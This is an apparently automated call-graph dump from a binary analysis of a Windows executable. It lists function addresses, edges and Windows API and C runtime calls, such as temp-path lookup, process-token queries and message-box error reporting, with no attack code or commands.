7ff7124f88aa 17086->17087 17088 7ff7124fc550 _log10_special 8 API calls 17087->17088 17089 7ff7124f88ba 17088->17089 17089->16835 17091 7ff7124f9390 2 API calls 17090->17091 17092 7ff7124f895c 17091->17092 17093 7ff7124f9390 2 API calls 17092->17093 17094 7ff7124f896c 17093->17094 17931 7ff712508238 17094->17931 17096 7ff7124f897a __vcrt_freefls 17096->16848 17098 7ff7124f90f5 17097->17098 17949 7ff7124f8570 GetCurrentProcess OpenProcessToken 17098->17949 17101 7ff7124f8570 7 API calls 17102 7ff7124f9121 17101->17102 17103 7ff7124f9154 17102->17103 17104 7ff7124f913a 17102->17104 17105 7ff7124f26b0 48 API calls 17103->17105 17106 7ff7124f26b0 48 API calls 17104->17106 17107 7ff7124f9167 LocalFree LocalFree 17105->17107 17108 7ff7124f9152 17106->17108 17109 7ff7124f9183 17107->17109 17111 7ff7124f918f 17107->17111 17108->17107 17959 7ff7124f2b50 17109->17959 17112 7ff7124fc550 _log10_special 8 API calls 17111->17112 17113 7ff7124f3c55 17112->17113 17113->16881 17114 7ff7124f8660 17113->17114 17115 7ff7124f8678 17114->17115 17116 7ff7124f869c 17115->17116 17117 7ff7124f86fa GetTempPathW GetCurrentProcessId 17115->17117 17119 7ff7124f8830 14 API calls 17116->17119 17968 7ff7124f25c0 17117->17968 17120 7ff7124f86a8 17119->17120 17975 7ff7124f81d0 17120->17975 17125 7ff7124f86e8 __vcrt_freefls 17146 7ff7124f87d4 __vcrt_freefls 17125->17146 17127 7ff712508238 38 API calls 17130 7ff7124f86ce __vcrt_freefls 17127->17130 17129 7ff7124f8728 __vcrt_freefls 17133 7ff7124f8765 __vcrt_freefls 17129->17133 17972 7ff712508b68 17129->17972 17130->17117 17134 7ff7124f86dc 17130->17134 17132 7ff7124fc550 _log10_special 8 API calls 17136 7ff7124f3cbb 17132->17136 17138 7ff7124f9390 2 API calls 17133->17138 17133->17146 17137 7ff7124f2810 49 API calls 17134->17137 17136->16881 17136->16893 17137->17125 17139 7ff7124f87b1 17138->17139 17140 7ff7124f87b6 17139->17140 17141 7ff7124f87e9 17139->17141 17143 7ff7124f9390 2 API calls 17140->17143 17142 7ff712508238 38 API calls 17141->17142 17142->17146 17144 7ff7124f87c6 17143->17144 17145 7ff712508238 38 API calls 17144->17145 17145->17146 17146->17132 17148 7ff7124f93b2 MultiByteToWideChar 17147->17148 17149 7ff7124f93d6 17147->17149 17148->17149 17151 7ff7124f93ec __vcrt_freefls 17148->17151 17150 7ff7124f93f3 MultiByteToWideChar 17149->17150 17149->17151 17150->17151 17151->16895 17158 7ff7124f33ce __scrt_get_show_window_mode 17152->17158 17153 7ff7124f35c7 17154 7ff7124fc550 _log10_special 8 API calls 17153->17154 17155 7ff7124f3664 17154->17155 17155->16898 17171 7ff7124f90c0 LocalFree 17155->17171 17157 7ff7124f1c80 49 API calls 17157->17158 17158->17153 17158->17157 17163 7ff7124f35c9 17158->17163 17165 7ff7124f35e2 17158->17165 17166 7ff7124f2a50 54 API calls 17158->17166 17169 7ff7124f35d0 17158->17169 18241 7ff7124f4560 17158->18241 18247 7ff7124f7e20 17158->18247 18258 7ff7124f1600 17158->18258 18306 7ff7124f7120 17158->18306 18310 7ff7124f4190 17158->18310 18354 7ff7124f4450 17158->18354 17160 7ff7124f2710 54 API calls 17160->17153 17164 7ff7124f2710 54 API calls 17163->17164 17164->17153 17165->17160 17166->17158 17170 7ff7124f2710 54 API calls 17169->17170 17170->17153 17173 7ff7124f1ca5 17172->17173 17174 7ff712504984 49 API calls 17173->17174 17175 7ff7124f1cc8 17174->17175 17175->16831 17177 7ff7124f9390 2 API calls 17176->17177 17178 7ff7124f89b4 17177->17178 17179 7ff712508238 38 API calls 17178->17179 17180 7ff7124f89c6 __vcrt_freefls 17179->17180 17180->16845 17182 7ff7124f45cc 17181->17182 17183 7ff7124f9390 2 API calls 17182->17183 17184 7ff7124f45f4 17183->17184 17185 7ff7124f9390 2 API calls 17184->17185 17186 7ff7124f4607 17185->17186 18521 7ff712505f94 17186->18521 17189 7ff7124fc550 _log10_special 8 API calls 17190 7ff7124f392b 17189->17190 17190->16834 17191 7ff7124f7f90 17190->17191 17192 7ff7124f7fb4 17191->17192 17193 7ff7125006d4 73 API calls 17192->17193 17196 7ff7124f808b __vcrt_freefls 17192->17196 17194 7ff7124f7fd0 17193->17194 17194->17196 18912 7ff7125078c8 17194->18912 17196->16838 17197 7ff7125006d4 73 API calls 17199 7ff7124f7fe5 17197->17199 17198 7ff71250039c _fread_nolock 53 API calls 17198->17199 17199->17196 17199->17197 17199->17198 17201 7ff71250007c 17200->17201 18927 7ff7124ffe28 17201->18927 17203 7ff712500095 17203->16834 17205 7ff7124fc850 17204->17205 17206 7ff7124f2734 GetCurrentProcessId 17205->17206 17207 7ff7124f1c80 49 API calls 17206->17207 17208 7ff7124f2787 17207->17208 17209 7ff712504984 49 API calls 17208->17209 17210 7ff7124f27cf 17209->17210 17211 7ff7124f2620 12 API calls 17210->17211 17212 7ff7124f27f1 17211->17212 17213 7ff7124fc550 _log10_special 8 API calls 17212->17213 17214 7ff7124f2801 17213->17214 17214->16898 17216 7ff7124f1c80 49 API calls 17215->17216 17217 7ff7124f44fd 17216->17217 17217->16876 17219 7ff7124f1c80 49 API calls 17218->17219 17220 7ff7124f4660 17219->17220 17220->16893 17222 7ff7124f6dd5 17221->17222 17223 7ff7124f3e6c 17222->17223 17224 7ff712504f08 _get_daylight 11 API calls 17222->17224 17227 7ff7124f7340 17223->17227 17225 7ff7124f6de2 17224->17225 17226 7ff7124f2910 54 API calls 17225->17226 17226->17223 18938 7ff7124f1470 17227->18938 17229 7ff7124f7368 17230 7ff7124f4630 49 API calls 17229->17230 17236 7ff7124f74b9 __vcrt_freefls 17229->17236 17231 7ff7124f738a 17230->17231 17232 7ff7124f4630 49 API calls 17231->17232 17234 7ff7124f738f 17231->17234 17235 7ff7124f73ae 17232->17235 17233 7ff7124f2a50 54 API calls 17233->17236 17234->17233 17235->17234 17237 7ff7124f4630 49 API calls 17235->17237 17236->16928 17238 7ff7124f73ca 17237->17238 17238->17234 17253 7ff7124f6e1c 17242->17253 17243 7ff7124fc550 _log10_special 8 API calls 17244 7ff7124f1840 45 API calls 17244->17253 17246 7ff7124f6faa 17248 7ff7124f2710 54 API calls 17246->17248 17247 7ff7124f1c80 49 API calls 17247->17253 17260 7ff7124f6f3f 17248->17260 17249 7ff7124f6f97 17250 7ff7124f2710 54 API calls 17249->17250 17250->17260 17251 7ff7124f4560 10 API calls 17251->17253 17252 7ff7124f7e20 52 API calls 17252->17253 17253->17244 17253->17246 17253->17247 17253->17249 17253->17251 17253->17252 17254 7ff7124f2a50 54 API calls 17253->17254 17255 7ff7124f6f84 17253->17255 17256 7ff7124f1600 118 API calls 17253->17256 17258 7ff7124f6f6d 17253->17258 17253->17260 17254->17253 17257 7ff7124f2710 54 API calls 17255->17257 17256->17253 17257->17260 17259 7ff7124f2710 54 API calls 17258->17259 17259->17260 17260->17243 18968 7ff7124f8e80 17261->18968 17278 7ff7124fc850 17277->17278 19044 7ff7124f6360 17295->19044 17298 7ff7124f3399 17304 7ff7124f3670 17298->17304 17305 7ff7124f367e 17304->17305 17306 7ff7124f368f 17305->17306 19317 7ff7124f8e60 FreeLibrary 17305->19317 17306->16920 17315 7ff71250546c EnterCriticalSection 17308->17315 17317 7ff7124f36bc GetModuleFileNameW 17316->17317 17317->17008 17317->17009 17319 7ff7124f92d2 17318->17319 17320 7ff7124f92bf FindClose 17318->17320 17321 7ff7124fc550 _log10_special 8 API calls 17319->17321 17320->17319 17322 7ff7124f371a 17321->17322 17322->17014 17322->17015 17324 7ff7124fc850 17323->17324 17325 7ff7124f2c70 GetCurrentProcessId 17324->17325 17354 7ff7124f26b0 17325->17354 17327 7ff7124f2cb9 17358 7ff712504bd8 17327->17358 17330 7ff7124f26b0 48 API calls 17331 7ff7124f2d34 FormatMessageW 17330->17331 17333 7ff7124f2d7f MessageBoxW 17331->17333 17334 7ff7124f2d6d 17331->17334 17336 7ff7124fc550 _log10_special 8 API calls 17333->17336 17335 7ff7124f26b0 48 API calls 17334->17335 17335->17333 17337 7ff7124f2daf 17336->17337 17337->17013 17339 7ff7124f9340 GetFinalPathNameByHandleW CloseHandle 17338->17339 17340 7ff7124f3730 17338->17340 17339->17340 17340->17022 17340->17023 17342 7ff7124f2834 17341->17342 17343 7ff7124f26b0 48 API calls 17342->17343 17344 7ff7124f2887 17343->17344 17345 7ff712504bd8 48 API calls 17344->17345 17346 7ff7124f28d0 MessageBoxW 17345->17346 17347 7ff7124fc550 _log10_special 8 API calls 17346->17347 17348 7ff7124f2900 17347->17348 17348->17013 17350 7ff7124f946a WideCharToMultiByte 17349->17350 17352 7ff7124f9495 17349->17352 17350->17352 17353 7ff7124f94ab __vcrt_freefls 17350->17353 17351 7ff7124f94b2 WideCharToMultiByte 17351->17353 17352->17351 17352->17353 17353->17021 17355 7ff7124f26d5 17354->17355 17356 7ff712504bd8 48 API calls 17355->17356 17357 7ff7124f26f8 17356->17357 17357->17327 17359 7ff712504c32 17358->17359 17360 7ff712504c57 17359->17360 17362 7ff712504c93 17359->17362 17361 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17360->17361 17364 7ff712504c81 17361->17364 17376 7ff712502f90 17362->17376 17367 7ff7124fc550 _log10_special 8 API calls 17364->17367 17365 7ff712504d74 17368 7ff71250a948 __free_lconv_num 11 API calls 17365->17368 17369 7ff7124f2d04 17367->17369 17368->17364 17369->17330 17370 7ff712504d9a 17370->17365 17372 7ff712504da4 17370->17372 17371 7ff712504d49 17373 7ff71250a948 __free_lconv_num 11 API calls 17371->17373 17375 7ff71250a948 __free_lconv_num 11 API calls 17372->17375 17373->17364 17374 7ff712504d40 17374->17365 17374->17371 17375->17364 17377 7ff712502fce 17376->17377 17378 7ff712502fbe 17376->17378 17379 7ff712502fd7 17377->17379 17384 7ff712503005 17377->17384 17382 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17378->17382 17380 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17379->17380 17381 7ff712502ffd 17380->17381 17381->17365 17381->17370 17381->17371 17381->17374 17382->17381 17384->17378 17384->17381 17387 7ff7125039a4 17384->17387 17420 7ff7125033f0 17384->17420 17457 7ff712502b80 17384->17457 17388 7ff7125039e6 17387->17388 17389 7ff712503a57 17387->17389 17390 7ff712503a81 17388->17390 17391 7ff7125039ec 17388->17391 17392 7ff712503ab0 17389->17392 17393 7ff712503a5c 17389->17393 17480 7ff712501d54 17390->17480 17394 7ff7125039f1 17391->17394 17395 7ff712503a20 17391->17395 17397 7ff712503ac7 17392->17397 17401 7ff712503aba 17392->17401 17405 7ff712503abf 17392->17405 17398 7ff712503a91 17393->17398 17400 7ff712503a5e 17393->17400 17394->17397 17402 7ff7125039f7 17394->17402 17395->17402 17395->17405 17494 7ff7125046ac 17397->17494 17487 7ff712501944 17398->17487 17399 7ff712503a00 17418 7ff712503af0 17399->17418 17460 7ff712504158 17399->17460 17400->17399 17409 7ff712503a6d 17400->17409 17401->17390 17401->17405 17402->17399 17408 7ff712503a32 17402->17408 17416 7ff712503a1b 17402->17416 17405->17418 17498 7ff712502164 17405->17498 17408->17418 17470 7ff712504494 17408->17470 17409->17390 17411 7ff712503a72 17409->17411 17411->17418 17476 7ff712504558 17411->17476 17412 7ff7124fc550 _log10_special 8 API calls 17413 7ff712503dea 17412->17413 17413->17384 17416->17418 17419 7ff712503cdc 17416->17419 17505 7ff7125047c0 17416->17505 17418->17412 17419->17418 17511 7ff71250ea08 17419->17511 17421 7ff712503414 17420->17421 17422 7ff7125033fe 17420->17422 17425 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17421->17425 17437 7ff712503454 17421->17437 17423 7ff7125039e6 17422->17423 17424 7ff712503a57 17422->17424 17422->17437 17426 7ff7125039ec 17423->17426 17428 7ff712503a81 17423->17428 17427 7ff712503a5c 17424->17427 17433 7ff712503ab0 17424->17433 17425->17437 17429 7ff7125039f1 17426->17429 17430 7ff712503a20 17426->17430 17431 7ff712503a91 17427->17431 17432 7ff712503a5e 17427->17432 17434 7ff712501d54 38 API calls 17428->17434 17435 7ff712503ac7 17429->17435 17439 7ff7125039f7 17429->17439 17430->17439 17442 7ff712503abf 17430->17442 17440 7ff712501944 38 API calls 17431->17440 17436 7ff712503a00 17432->17436 17446 7ff712503a6d 17432->17446 17433->17435 17438 7ff712503aba 17433->17438 17433->17442 17453 7ff712503a1b 17434->17453 17443 7ff7125046ac 45 API calls 17435->17443 17441 7ff712504158 47 API calls 17436->17441 17456 7ff712503af0 17436->17456 17437->17384 17438->17428 17438->17442 17439->17436 17444 7ff712503a32 17439->17444 17439->17453 17440->17453 17441->17453 17445 7ff712502164 38 API calls 17442->17445 17442->17456 17443->17453 17447 7ff712504494 46 API calls 17444->17447 17444->17456 17445->17453 17446->17428 17448 7ff712503a72 17446->17448 17447->17453 17451 7ff712504558 37 API calls 17448->17451 17448->17456 17449 7ff7124fc550 _log10_special 8 API calls 17450 7ff712503dea 17449->17450 17450->17384 17451->17453 17452 7ff7125047c0 45 API calls 17455 7ff712503cdc 17452->17455 17453->17452 17453->17455 17453->17456 17454 7ff71250ea08 46 API calls 17454->17455 17455->17454 17455->17456 17456->17449 17677 7ff712500fc8 17457->17677 17461 7ff71250417e 17460->17461 17523 7ff712500b80 17461->17523 17466 7ff7125047c0 45 API calls 17469 7ff7125042c3 17466->17469 17467 7ff712504351 17467->17416 17467->17467 17468 7ff7125047c0 45 API calls 17468->17467 17469->17467 17469->17468 17469->17469 17472 7ff7125044c9 17470->17472 17471 7ff71250450e 17471->17416 17472->17471 17473 7ff7125044e7 17472->17473 17474 7ff7125047c0 45 API calls 17472->17474 17475 7ff71250ea08 46 API calls 17473->17475 17474->17473 17475->17471 17479 7ff712504579 17476->17479 17477 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17478 7ff7125045aa 17477->17478 17478->17416 17479->17477 17479->17478 17481 7ff712501d87 17480->17481 17482 7ff712501db6 17481->17482 17484 7ff712501e73 17481->17484 17486 7ff712501df3 17482->17486 17650 7ff712500c28 17482->17650 17485 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17484->17485 17485->17486 17486->17416 17488 7ff712501977 17487->17488 17489 7ff7125019a6 17488->17489 17491 7ff712501a63 17488->17491 17490 7ff712500c28 12 API calls 17489->17490 17493 7ff7125019e3 17489->17493 17490->17493 17492 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17491->17492 17492->17493 17493->17416 17495 7ff7125046ef 17494->17495 17497 7ff7125046f3 __crtLCMapStringW 17495->17497 17658 7ff712504748 17495->17658 17497->17416 17500 7ff712502197 17498->17500 17499 7ff7125021c6 17501 7ff712500c28 12 API calls 17499->17501 17504 7ff712502203 17499->17504 17500->17499 17502 7ff712502283 17500->17502 17501->17504 17503 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17502->17503 17503->17504 17504->17416 17506 7ff7125047d7 17505->17506 17662 7ff71250d9b8 17506->17662 17513 7ff71250ea39 17511->17513 17521 7ff71250ea47 17511->17521 17512 7ff71250ea67 17515 7ff71250ea78 17512->17515 17516 7ff71250ea9f 17512->17516 17513->17512 17514 7ff7125047c0 45 API calls 17513->17514 17513->17521 17514->17512 17670 7ff7125100a0 17515->17670 17518 7ff71250eac9 17516->17518 17519 7ff71250eb2a 17516->17519 17516->17521 17518->17521 17522 7ff71250f8a0 _fread_nolock MultiByteToWideChar 17518->17522 17520 7ff71250f8a0 _fread_nolock MultiByteToWideChar 17519->17520 17520->17521 17521->17419 17522->17521 17524 7ff712500ba6 17523->17524 17525 7ff712500bb7 17523->17525 17531 7ff71250e570 17524->17531 17525->17524 17526 7ff71250d5fc _fread_nolock 12 API calls 17525->17526 17527 7ff712500be4 17526->17527 17529 7ff71250a948 __free_lconv_num 11 API calls 17527->17529 17530 7ff712500bf8 17527->17530 17528 7ff71250a948 __free_lconv_num 11 API calls 17528->17524 17529->17530 17530->17528 17532 7ff71250e58d 17531->17532 17533 7ff71250e5c0 17531->17533 17534 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17532->17534 17533->17532 17536 7ff71250e5f2 17533->17536 17535 7ff7125042a1 17534->17535 17535->17466 17535->17469 17541 7ff71250e705 17536->17541 17548 7ff71250e63a 17536->17548 17537 7ff71250e7f7 17577 7ff71250da5c 17537->17577 17539 7ff71250e7bd 17570 7ff71250ddf4 17539->17570 17541->17537 17541->17539 17542 7ff71250e78c 17541->17542 17543 7ff71250e74f 17541->17543 17545 7ff71250e745 17541->17545 17563 7ff71250e0d4 17542->17563 17553 7ff71250e304 17543->17553 17545->17539 17547 7ff71250e74a 17545->17547 17547->17542 17547->17543 17548->17535 17549 7ff71250a4a4 __std_exception_copy 37 API calls 17548->17549 17550 7ff71250e6f2 17549->17550 17550->17535 17551 7ff71250a900 _isindst 17 API calls 17550->17551 17552 7ff71250e854 17551->17552 17586 7ff7125140ac 17553->17586 17557 7ff71250e3ac 17558 7ff71250e401 17557->17558 17560 7ff71250e3cc 17557->17560 17562 7ff71250e3b0 17557->17562 17639 7ff71250def0 17558->17639 17560->17560 17635 7ff71250e1ac 17560->17635 17562->17535 17564 7ff7125140ac 38 API calls 17563->17564 17565 7ff71250e11e 17564->17565 17566 7ff712513af4 37 API calls 17565->17566 17567 7ff71250e16e 17566->17567 17568 7ff71250e172 17567->17568 17569 7ff71250e1ac 45 API calls 17567->17569 17568->17535 17569->17568 17571 7ff7125140ac 38 API calls 17570->17571 17572 7ff71250de3f 17571->17572 17573 7ff712513af4 37 API calls 17572->17573 17574 7ff71250de97 17573->17574 17575 7ff71250de9b 17574->17575 17576 7ff71250def0 45 API calls 17574->17576 17575->17535 17576->17575 17578 7ff71250daa1 17577->17578 17579 7ff71250dad4 17577->17579 17580 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17578->17580 17581 7ff71250daec 17579->17581 17583 7ff71250db6d 17579->17583 17585 7ff71250dacd __scrt_get_show_window_mode 17580->17585 17582 7ff71250ddf4 46 API calls 17581->17582 17582->17585 17584 7ff7125047c0 45 API calls 17583->17584 17583->17585 17584->17585 17585->17535 17587 7ff7125140ff fegetenv 17586->17587 17588 7ff712517e2c 37 API calls 17587->17588 17593 7ff712514152 17588->17593 17589 7ff71251417f 17592 7ff71250a4a4 __std_exception_copy 37 API calls 17589->17592 17590 7ff712514242 17591 7ff712517e2c 37 API calls 17590->17591 17594 7ff71251426c 17591->17594 17595 7ff7125141fd 17592->17595 17593->17590 17596 7ff71251416d 17593->17596 17597 7ff71251421c 17593->17597 17598 7ff712517e2c 37 API calls 17594->17598 17600 7ff712515324 17595->17600 17605 7ff712514205 17595->17605 17596->17589 17596->17590 17601 7ff71250a4a4 __std_exception_copy 37 API calls 17597->17601 17599 7ff71251427d 17598->17599 17602 7ff712518020 20 API calls 17599->17602 17603 7ff71250a900 _isindst 17 API calls 17600->17603 17601->17595 17613 7ff7125142e6 __scrt_get_show_window_mode 17602->17613 17604 7ff712515339 17603->17604 17606 7ff7124fc550 _log10_special 8 API calls 17605->17606 17607 7ff71250e351 17606->17607 17631 7ff712513af4 17607->17631 17608 7ff71251468f __scrt_get_show_window_mode 17609 7ff712514327 memcpy_s 17626 7ff712514783 memcpy_s __scrt_get_show_window_mode 17609->17626 17627 7ff712514c6b memcpy_s __scrt_get_show_window_mode 17609->17627 17610 7ff7125149cf 17611 7ff712513c10 37 API calls 17610->17611 17617 7ff7125150e7 17611->17617 17612 7ff71251497b 17612->17610 17614 7ff71251533c memcpy_s 37 API calls 17612->17614 17613->17608 17613->17609 17615 7ff712504f08 _get_daylight 11 API calls 17613->17615 17614->17610 17616 7ff712514760 17615->17616 17618 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17616->17618 17620 7ff71251533c memcpy_s 37 API calls 17617->17620 17624 7ff712515142 17617->17624 17618->17609 17619 7ff7125152c8 17622 7ff712517e2c 37 API calls 17619->17622 17620->17624 17621 7ff712504f08 11 API calls _get_daylight 17621->17627 17622->17605 17623 7ff712504f08 11 API calls _get_daylight 17623->17626 17624->17619 17625 7ff712513c10 37 API calls 17624->17625 17629 7ff71251533c memcpy_s 37 API calls 17624->17629 17625->17624 17626->17612 17626->17623 17628 7ff71250a8e0 37 API calls _invalid_parameter_noinfo 17626->17628 17627->17610 17627->17612 17627->17621 17630 7ff71250a8e0 37 API calls _invalid_parameter_noinfo 17627->17630 17628->17626 17629->17624 17630->17627 17632 7ff712513b13 17631->17632 17633 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17632->17633 17634 7ff712513b3e memcpy_s 17632->17634 17633->17634 17634->17557 17636 7ff71250e1d8 memcpy_s 17635->17636 17636->17636 17637 7ff7125047c0 45 API calls 17636->17637 17638 7ff71250e292 memcpy_s __scrt_get_show_window_mode 17636->17638 17637->17638 17638->17562 17640 7ff71250df2b 17639->17640 17643 7ff71250df78 memcpy_s 17639->17643 17641 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17640->17641 17642 7ff71250df57 17641->17642 17642->17562 17644 7ff71250dfe3 17643->17644 17646 7ff7125047c0 45 API calls 17643->17646 17645 7ff71250a4a4 __std_exception_copy 37 API calls 17644->17645 17649 7ff71250e025 memcpy_s 17645->17649 17646->17644 17647 7ff71250a900 _isindst 17 API calls 17648 7ff71250e0d0 17647->17648 17649->17647 17651 7ff712500c5f 17650->17651 17652 7ff712500c4e 17650->17652 17651->17652 17653 7ff71250d5fc _fread_nolock 12 API calls 17651->17653 17652->17486 17654 7ff712500c90 17653->17654 17655 7ff712500ca4 17654->17655 17656 7ff71250a948 __free_lconv_num 11 API calls 17654->17656 17657 7ff71250a948 __free_lconv_num 11 API calls 17655->17657 17656->17655 17657->17652 17659 7ff712504766 17658->17659 17661 7ff71250476e 17658->17661 17660 7ff7125047c0 45 API calls 17659->17660 17660->17661 17661->17497 17663 7ff7125047ff 17662->17663 17664 7ff71250d9d1 17662->17664 17666 7ff71250da24 17663->17666 17664->17663 17665 7ff712513304 45 API calls 17664->17665 17665->17663 17667 7ff71250da3d 17666->17667 17668 7ff71250480f 17666->17668 17667->17668 17669 7ff712512650 45 API calls 17667->17669 17668->17419 17669->17668 17673 7ff712516d88 17670->17673 17676 7ff712516dec 17673->17676 17674 7ff7124fc550 _log10_special 8 API calls 17675 7ff7125100bd 17674->17675 17675->17521 17676->17674 17678 7ff71250100f 17677->17678 17679 7ff712500ffd 17677->17679 17682 7ff71250101d 17678->17682 17686 7ff712501059 17678->17686 17680 7ff712504f08 _get_daylight 11 API calls 17679->17680 17681 7ff712501002 17680->17681 17683 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17681->17683 17684 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17682->17684 17691 7ff71250100d 17683->17691 17684->17691 17685 7ff7125013d5 17687 7ff712504f08 _get_daylight 11 API calls 17685->17687 17685->17691 17686->17685 17688 7ff712504f08 _get_daylight 11 API calls 17686->17688 17689 7ff712501669 17687->17689 17690 7ff7125013ca 17688->17690 17692 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17689->17692 17693 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17690->17693 17691->17384 17692->17691 17693->17685 17695 7ff712500704 17694->17695 17722 7ff712500464 17695->17722 17697 7ff71250071d 17697->17037 17734 7ff7125003bc 17698->17734 17702 7ff7124fc850 17701->17702 17703 7ff7124f2930 GetCurrentProcessId 17702->17703 17704 7ff7124f1c80 49 API calls 17703->17704 17705 7ff7124f2979 17704->17705 17748 7ff712504984 17705->17748 17710 7ff7124f1c80 49 API calls 17711 7ff7124f29ff 17710->17711 17778 7ff7124f2620 17711->17778 17714 7ff7124fc550 _log10_special 8 API calls 17715 7ff7124f2a31 17714->17715 17715->17076 17717 7ff7124f1b89 17716->17717 17718 7ff712500119 17716->17718 17717->17075 17717->17076 17719 7ff712504f08 _get_daylight 11 API calls 17718->17719 17720 7ff71250011e 17719->17720 17721 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17720->17721 17721->17717 17723 7ff7125004ce 17722->17723 17724 7ff71250048e 17722->17724 17723->17724 17726 7ff7125004da 17723->17726 17725 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17724->17725 17727 7ff7125004b5 17725->17727 17733 7ff71250546c EnterCriticalSection 17726->17733 17727->17697 17735 7ff7125003e6 17734->17735 17746 7ff7124f1a20 17734->17746 17736 7ff7125003f5 __scrt_get_show_window_mode 17735->17736 17737 7ff712500432 17735->17737 17735->17746 17740 7ff712504f08 _get_daylight 11 API calls 17736->17740 17747 7ff71250546c EnterCriticalSection 17737->17747 17742 7ff71250040a 17740->17742 17744 7ff71250a8e0 _invalid_parameter_noinfo 37 API calls 17742->17744 17744->17746 17746->17044 17746->17045 17752 7ff7125049de 17748->17752 17749 7ff712504a03 17750 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17749->17750 17754 7ff712504a2d 17750->17754 17751 7ff712504a3f 17787 7ff712502c10 17751->17787 17752->17749 17752->17751 17756 7ff7124fc550 _log10_special 8 API calls 17754->17756 17755 7ff712504b1c 17757 7ff71250a948 __free_lconv_num 11 API calls 17755->17757 17758 7ff7124f29c3 17756->17758 17757->17754 17766 7ff712505160 17758->17766 17760 7ff712504af1 17763 7ff71250a948 __free_lconv_num 11 API calls 17760->17763 17761 7ff712504b40 17761->17755 17762 7ff712504b4a 17761->17762 17765 7ff71250a948 __free_lconv_num 11 API calls 17762->17765 17763->17754 17764 7ff712504ae8 17764->17755 17764->17760 17765->17754 17767 7ff71250b2c8 _get_daylight 11 API calls 17766->17767 17768 7ff712505177 17767->17768 17769 7ff7124f29e5 17768->17769 17770 7ff71250eb98 _get_daylight 11 API calls 17768->17770 17772 7ff7125051b7 17768->17772 17769->17710 17771 7ff7125051ac 17770->17771 17773 7ff71250a948 __free_lconv_num 11 API calls 17771->17773 17772->17769 17922 7ff71250ec20 17772->17922 17773->17772 17776 7ff71250a900 _isindst 17 API calls 17777 7ff7125051fc 17776->17777 17779 7ff7124f262f 17778->17779 17780 7ff7124f9390 2 API calls 17779->17780 17781 7ff7124f2660 17780->17781 17782 7ff7124f2683 MessageBoxA 17781->17782 17783 7ff7124f266f MessageBoxW 17781->17783 17784 7ff7124f2690 17782->17784 17783->17784 17785 7ff7124fc550 _log10_special 8 API calls 17784->17785 17786 7ff7124f26a0 17785->17786 17786->17714 17788 7ff712502c4e 17787->17788 17789 7ff712502c3e 17787->17789 17790 7ff712502c57 17788->17790 17795 7ff712502c85 17788->17795 17791 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17789->17791 17792 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17790->17792 17793 7ff712502c7d 17791->17793 17792->17793 17793->17755 17793->17760 17793->17761 17793->17764 17794 7ff7125047c0 45 API calls 17794->17795 17795->17789 17795->17793 17795->17794 17797 7ff712502f34 17795->17797 17801 7ff7125035a0 17795->17801 17827 7ff712503268 17795->17827 17857 7ff712502af0 17795->17857 17799 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17797->17799 17799->17789 17802 7ff712503655 17801->17802 17803 7ff7125035e2 17801->17803 17806 7ff7125036af 17802->17806 17807 7ff71250365a 17802->17807 17804 7ff71250367f 17803->17804 17805 7ff7125035e8 17803->17805 17874 7ff712501b50 17804->17874 17814 7ff7125035ed 17805->17814 17818 7ff7125036be 17805->17818 17806->17804 17806->17818 17825 7ff712503618 17806->17825 17808 7ff71250368f 17807->17808 17809 7ff71250365c 17807->17809 17881 7ff712501740 17808->17881 17811 7ff7125035fd 17809->17811 17817 7ff71250366b 17809->17817 17826 7ff7125036ed 17811->17826 17860 7ff712503f04 17811->17860 17814->17811 17816 7ff712503630 17814->17816 17814->17825 17816->17826 17870 7ff7125043c0 17816->17870 17817->17804 17820 7ff712503670 17817->17820 17818->17826 17888 7ff712501f60 17818->17888 17822 7ff712504558 37 API calls 17820->17822 17820->17826 17821 7ff7124fc550 _log10_special 8 API calls 17823 7ff712503983 17821->17823 17822->17825 17823->17795 17825->17826 17895 7ff71250e858 17825->17895 17826->17821 17828 7ff712503273 17827->17828 17829 7ff712503289 17827->17829 17830 7ff7125032c7 17828->17830 17831 7ff712503655 17828->17831 17832 7ff7125035e2 17828->17832 17829->17830 17833 7ff71250a814 _invalid_parameter_noinfo 37 API calls 17829->17833 17830->17795 17836 7ff7125036af 17831->17836 17837 7ff71250365a 17831->17837 17834 7ff71250367f 17832->17834 17835 7ff7125035e8 17832->17835 17833->17830 17841 7ff712501b50 38 API calls 17834->17841 17838 7ff7125035ed 17835->17838 17840 7ff7125036be 17835->17840 17836->17834 17836->17840 17855 7ff712503618 17836->17855 17839 7ff71250368f 17837->17839 17844 7ff71250365c 17837->17844 17845 7ff7125035fd 17838->17845 17846 7ff712503630 17838->17846 17838->17855 17842 7ff712501740 38 API calls 17839->17842 17847 7ff712501f60 38 API calls 17840->17847 17856 7ff7125036ed 17840->17856 17841->17855 17842->17855 17843 7ff712503f04 47 API calls 17843->17855 17844->17845 17848 7ff71250366b 17844->17848 17845->17843 17845->17856 17849 7ff7125043c0 47 API calls 17846->17849 17846->17856 17847->17855 17848->17834 17850 7ff712503670 17848->17850 17849->17855 17852 7ff712504558 37 API calls 17850->17852 17850->17856 17851 7ff7124fc550 _log10_special 8 API calls 17853 7ff712503983 17851->17853 17852->17855 17853->17795 17854 7ff71250e858 47 API calls 17854->17855 17855->17854 17855->17856 17856->17851 17905 7ff712500d14 17857->17905 17861 7ff712503f26 17860->17861 17862 7ff712500b80 12 API calls 17861->17862 17863 7ff712503f6e 17862->17863 17864 7ff71250e570 46 API calls 17863->17864 17865 7ff712504041 17864->17865 17866 7ff7125047c0 45 API calls 